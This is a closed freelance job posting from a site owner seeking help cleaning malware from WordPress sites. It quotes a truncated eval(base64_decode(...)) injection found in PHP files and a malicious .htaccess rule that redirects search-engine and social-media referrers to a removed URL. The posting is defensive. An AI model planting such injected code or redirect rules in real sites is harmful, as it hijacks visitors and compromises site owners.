Closed

Malware removal .htaccess problem

This project received 12 bids from talented freelancers with an average bid price of $102 USD.

Get free quotes for a project like this
Employer working
Skills Required
Project Budget
$30 - $250 USD
Total Bids
12
Project Description

There are two security issues that my sites(hosted on bluehost) face:

1. All php files are added with a code like:

eval(base64_decode("DQplcnJvcl9yZXBvcn..................

I have noticed that a virus/malware in my server replaces

<php

with

<php eval(base64_decode("DQplcnJvcl9yZXBvcn..................

in all the files throughout the server.

This problem firstly occurred on 25t feb then on 5th March(I have removed the code using unix sed.) so I updated some of the wordpress websites and removed those themes/files which seems suspicious then this problem never came back. So i believe this issue has been rectified but i would like someone to confirm it.

2. htaccess file of my websites has be added with a code like:

----------

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ [url removed, login to view] [R=301,L]

ErrorDocument 400 [url removed, login to view]


----------

I'm in need of a security expert to go through locate and clear the malware, disable the redirects and disable the door(s) the hacker is entering through by creating permanent re-entry blocks and update/change/remove files as needed to ensure that these problems do not reoccur.

In case of any questions please let me know.

Looking to make some money?

  • Set your budget and the timeframe
  • Outline your proposal
  • Get paid for your work

Hire Freelancers who also bid on this project

    • Forbes
    • The New York Times
    • Time
    • Wall Street Journal
    • Times Online